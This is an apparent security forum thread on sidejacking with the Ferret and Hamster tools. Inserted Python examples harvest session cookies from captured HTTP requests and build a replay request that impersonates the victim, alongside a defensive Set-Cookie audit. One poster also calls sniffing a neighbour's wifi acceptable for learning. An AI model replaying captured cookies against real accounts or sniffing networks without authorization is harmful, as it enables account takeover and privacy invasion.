
Sidejacking made even easier. A script kiddie's wet dream in 1 click....


digip


Two tools, which some of you may have heard of already, called Ferret and Hamster, are making their way around the internet. One is a packet sniffer that only looks for cookies and the other is a localhost proxy/pcap analyzer used to hijack user sessions. When combined together these little programs form a nice little function called Sidejacking. Similar to MITM attacks to take over another user's account, only they do not rely on using an ARP poison attack to sit between the user and the router. Instead, they use captured packets from the network to reconstruct both regular and session cookies to mask yourself as the targeted user. So easy, anyone can figure it out.

This works on both Wifi and any Ethernet LAN you may be on, although switched networks should not be affected since they do not rebroadcast to every device on the LAN. If the target is not encrypting their traffic using SSL, TLS, SSH, etc., then any captured web traffic containing cookies can be used to authenticate as the user WITHOUT needing their login name or password or a means to decrypt any hashes. Since Ferret is only looking for cookies to authenticate as the user, it cuts down on the amount of traffic that needs to be captured by other programs like Wireshark, Ettercap, etc. Dumped pcap files (as hamster.txt) will be small in comparison to the long logs often seen from Wireshark and other programs when doing MITM attacks. Filtering the captures for only cookie data using Wireshark works when saving the log to hamster.txt to be used by hamster.exe.

Hamster creates a little localhost proxy to view the visited websites of your targets, so all you have to do is click any links they visited through Hamster's browser interface and it passes the cookie back to the web server as if you were them, thus performing the Sidejack and logging you on as them.

I tested it on my own network just to see how simple it was. I have to say, it is scary easy to perform and I can see people recompiling the sources into one tool at some point, taking out all the guesswork and the need to set up everything. A script kiddie's wet dream in 1 click....

There is no need for me to post the link to these tools on Hak5, as they are easy to find with Google.

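The two halves of the attack described in the post above, in miniature, as an added example that is not Ferret or Hamster code: one function does what Ferret does (walk captured plaintext HTTP requests and pull the Cookie header out per host), the other does what Hamster does (rebuild a request to that host carrying the victim's cookies). The captured requests, host names, paths and cookie values are constructed for the example, and the function names are this example's own.

```python
"""Added example (not Ferret or Hamster code): the two halves of a sidejack in
miniature. Ferret's half walks captured plaintext HTTP requests and pulls the
Cookie header out per host; Hamster's half rebuilds a request to that host
carrying the victim's cookies. Hosts, paths and cookie values are constructed."""
from typing import Dict, List, Tuple

# Constructed sample: the TCP payloads of four HTTP requests as they would
# appear in a pcap (hypothetical hosts and cookie values).
CAPTURED_REQUESTS: List[bytes] = [
    b"GET /inbox HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: SESSIONID=8f3a9c2e; lang=en\r\n"
    b"\r\n",
    b"GET /images/logo.png HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"Cookie: SESSIONID=8f3a9c2e; lang=en; tz=UTC\r\n"
    b"\r\n",
    b"POST /status HTTP/1.1\r\n"
    b"Host: social.example.test\r\n"
    b"Content-Length: 9\r\n"
    b"Cookie: auth=QWxhZGRpbjpvcGVu\r\n"
    b"\r\n"
    b"text=hi!!",
    b"GET / HTTP/1.1\r\n"          # no Cookie header: nothing to steal here
    b"Host: static.example.test\r\n"
    b"\r\n",
]


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, path, headers) for one request; header names lower-cased."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value: str) -> Dict[str, str]:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; malformed pieces are skipped."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            cookies[name] = val
    return cookies


def harvest_cookies(requests: List[bytes]) -> Dict[str, Dict[str, str]]:
    """Ferret's job: per host, merge every cookie a client sent in the clear."""
    jar: Dict[str, Dict[str, str]] = {}
    for raw in requests:
        _method, _path, headers = parse_request(raw)
        host = headers.get("host")
        if not host or "cookie" not in headers:
            continue
        jar.setdefault(host, {}).update(parse_cookie_header(headers["cookie"]))
    return jar


def build_replay_request(host: str, path: str, jar: Dict[str, Dict[str, str]]) -> bytes:
    """Hamster's job: a fresh GET for `path` on `host` that carries the victim's
    cookies, so the server answers as if the victim had clicked the link.
    No username, password or hash is involved; the cookie is the credential."""
    cookie_line = "; ".join(f"{k}={v}" for k, v in jar[host].items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_line}\r\n\r\n".encode()


if __name__ == "__main__":
    jar = harvest_cookies(CAPTURED_REQUESTS)
    for host, cookies in jar.items():
        print(host, cookies)
    print(build_replay_request("mail.example.test", "/inbox", jar).decode())
```

The point the post makes is visible in the last function: the replayed request contains nothing but the host, the path and the captured Cookie line. A real sniffer has to reassemble TCP streams first, and Hamster does this through a browser proxy rather than raw sockets, but the credential it forwards is exactly that header.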

Actually, I just tried it using HTTPS and I was able to still log on due to session cookies being available. So it seems SSL does not thwart the attack as I had thought. I'll test it some more later using my laptop's wifi when I get the chance, to make sure. I am testing it on my PC only at the moment and this probably isn't the best way to see if SSL will block it. I think I will get the same results though, and it will still be able to log on if the server or the user rebroadcasts the session data in the clear.

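Why an HTTPS login on its own does not stop the sidejack observed in the reply above, as an added example that is not from the original thread: a cookie issued without the `Secure` attribute is attached by the browser to plain-HTTP requests for the same host as well (a mixed-content image, a link typed without https://), and that one plaintext request is all the sniffer needs. The Set-Cookie headers, cookie values and function names below are constructed for the example.

```python
"""Added example (not from the original thread): why an HTTPS login alone does
not stop a sidejack. Cookies issued without the Secure attribute are attached
to plain-HTTP requests for the same host as well, and one such request is all
the sniffer needs. Set-Cookie values below are constructed for the example."""
from typing import Dict, List

# Constructed Set-Cookie headers, as a login response over HTTPS might issue them.
RESPONSE_SET_COOKIES: List[str] = [
    "SESSIONID=8f3a9c2e; Path=/; HttpOnly",                          # no Secure: leaks over http://
    "csrf=7d1e; Path=/; Secure",
    "auth=QWxhZGRpbjpvcGVu; Path=/; Secure; HttpOnly; SameSite=Lax",
    "lang=en; Path=/",                                               # harmless, but also leaks
]


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split one Set-Cookie value into name, value and the attribute names it carries."""
    first, *attrs = (part.strip() for part in header.split(";"))
    name, _, value = first.partition("=")
    flags = {attr.split("=", 1)[0].lower() for attr in attrs if attr}
    return {"name": name, "value": value, "secure": "secure" in flags, "httponly": "httponly" in flags}


def cookies_sent_over_plaintext(set_cookie_headers: List[str]) -> Dict[str, str]:
    """Simulate the browser's rule for an http:// request to the same host:
    every cookie without Secure is attached, and is therefore sniffable."""
    return {
        c["name"]: c["value"]
        for c in map(parse_set_cookie, set_cookie_headers)
        if not c["secure"]
    }


def audit_set_cookies(set_cookie_headers: List[str]) -> List[str]:
    """Defender's check: one finding per missing attribute, in header order."""
    findings: List[str] = []
    for c in map(parse_set_cookie, set_cookie_headers):
        if not c["secure"]:
            findings.append(f"{c['name']}: missing Secure, sent in the clear over http://")
        if not c["httponly"]:
            findings.append(f"{c['name']}: missing HttpOnly, readable by injected script")
    return findings


if __name__ == "__main__":
    print("leaks over plaintext:", cookies_sent_over_plaintext(RESPONSE_SET_COOKIES))
    for finding in audit_set_cookies(RESPONSE_SET_COOKIES):
        print(finding)
```

Run this against your own application's login response (the Set-Cookie lines from the browser's network tab or from curl) rather than the constructed list: the session cookie is the one that matters, and if it appears in the "leaks over plaintext" dictionary the whole site may as well be HTTP as far as a sniffer is concerned.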

This can be done easily with Wireshark and a cookie editor in Firefox. You have been able to do this for many years.

Agreed, though it's now easier for skiddies. Like only-a-few-clicks easy. Wireshark required knowledge.

If you can read, you can use Wireshark.


This can be done easily with Wireshark and a cookie editor in Firefox. You have been able to do this for many years.

My post wasn't anything new. Session stealing has been around longer than some of us have even been on the internet. What was interesting to me is how automated and easy these attacks are becoming. Pretty soon, XSS attacks will be a one-click setup and all you have to do is type in the name of your target. Look at Metasploit. Great tool to audit your LAN's servers and workstations, but it's also the same tool used by 12-year-old kids who know how to read and open a web browser. Doesn't make them any more skilled, just that they know where to put the key in and how to step on the gas.

Yes. Session stealing is nothing new and I totally agree with you on the Wireshark comment.

It is just to the point these days that everything is so easy, people walk around calling themselves "haxorz" and never once did anything themselves that wasn't automated for them. Every tool used by people to hijack a wireless connection or users' sessions exists because someone, who was the real hacker, wrote it themselves. We just all end up using their tools. I am not saying there isn't skill in learning how to do these things, but kids today do not need to learn about all the details under the hood in order to drive the cars they own. It's also part of the problem and why there are so many people on here asking how to hack their school. Instead of learning how to do things and in turn educating themselves, they end up running their mouths about how "l337" they are when they just discovered some tool that does everything for them. The real elite are the ones who wrote the tools.

I have to admit I have used some of these tools in the past, but not because I want to hack someone or break into something. I am no saint when it comes to computers, but I have no desire to use these for ill intent. I do however like to learn about these things and see how they work. What picks my brain more is how it does it, and learning about that is what has always intrigued me about computers. It's not the tool and what it does, but how it does it that makes me want to learn about it. I could care less about logging onto someone's email or MySpace page, but what I do want to know is: what is the flaw, what is the hole, where is the weakness, how do you exploit it, and how do you defend against it. How does it all work has always been my goal and not "how many peepz can I pwn with my l337 haxor skillz".


This can be done easily with Wireshark and a cookie editor in Firefox. You have been able to do this for many years.

Pretty soon, XSS attacks will be a one click setup and all you have to do is type in the name of your target.

http://www.securitycompass.com/exploitme.shtml

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS).

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.


If I'm not mistaken, you need to be on the same network, right?

Well, yes if you want to do a MITM and then use that in combination with Ferret and Hamster, but no if your wireless card can see all wireless traffic.

Most Windows machines I have seen cannot do this by default without certain wireless cards or something like AirPcap

(http://www.cacetech.com/products/airpcap_family.htm?utm_source=Wireshark&utm_medium=cpc&utm_term=airpcap&utm_content=airpcap&utm_campaign=Wireshark_Product).

Granted, a MITM attack pretty much will give you everything you want anyway. Using something like Cain + Ferret + Hamster just makes it easier to not have to go through Wireshark logs and edit the cookies manually. Cain is usually just going to show you the passwords it finds, but since there are none in the event that they log on using just the cookies or are already logged onto the site, Ferret and Hamster make it easy to just click the link of your targeted user and you're automatically logged on to the page they are viewing.


Very interesting. I just wanted to add I don't think it's wrong to use things like this in a controlled environment. I myself have a lot of curiosity, so I made a lab to test exploits and vulnerabilities without harming anyone else. I think this is totally acceptable, but sometimes I feel wrong to have this curiosity or that I will be ridiculed here for sharing my findings. I say to each his own; let individuals take personal responsibility for their actions, but let's not put down someone's actions unless it's based on their intent. Trust me, I have seen the posts here "how do I hack my school network" and that is dumb, and I am happy that a lot of you lead people with that mind state in the right direction. Ultimately my point is I think we should allow people to test things here and share them, of this nature, for good intent only. Yes, there will always be somebody that takes advantage, but freedom of information is good. So why not make it work with the Switchblade? It's an idea and a project to explore and invent..


Very interesting. I just wanted to add I don't think it's wrong to use things like this in a controlled environment. I myself have a lot of curiosity, so I made a lab to test exploits and vulnerabilities without harming anyone else. I think this is totally acceptable, but sometimes I feel wrong to have this curiosity or that I will be ridiculed here for sharing my findings. I say to each his own; let individuals take personal responsibility for their actions, but let's not put down someone's actions unless it's based on their intent. Trust me, I have seen the posts here "how do I hack my school network" and that is dumb, and I am happy that a lot of you lead people with that mind state in the right direction. Ultimately my point is I think we should allow people to test things here and share them, of this nature, for good intent only. Yes, there will always be somebody that takes advantage, but freedom of information is good. So why not make it work with the Switchblade? It's an idea and a project to explore and invent..

I have no problem with people using these tools. I just do not want to spoon-feed 90% of the script kiddies on the forums; I want them to put in the effort and work to learn something instead of just wanting to pwn everything. As far as pentesting and research, I am all for it, even when it's sniffing the neighbor's wifi, so long as you're not going to try compromising their info or account and it's all just for the learning experience.

I myself love reading about tools like this and for me it's more about the knowledge gained from learning the tools than it is about what I can do with them. If you're up for some good reading that really picks my brain and keeps me busy, go through the SANS Daily Diary and its archives. Lots of good info to read through and a good place to learn about things like this. They also often have tools listed you can use in defending against attacks and whatnot, and for pentesting your own networks.

http://isc.sans.org/diaryarchive.html

(Be sure you set up a dedicated box that is isolated from the rest of your network and one that you're using just for testing when connecting to some of the sites they list, as they will often give you links to sites with live viruses and spyware as well as different attacks to gain root on a machine just by visiting the site!)

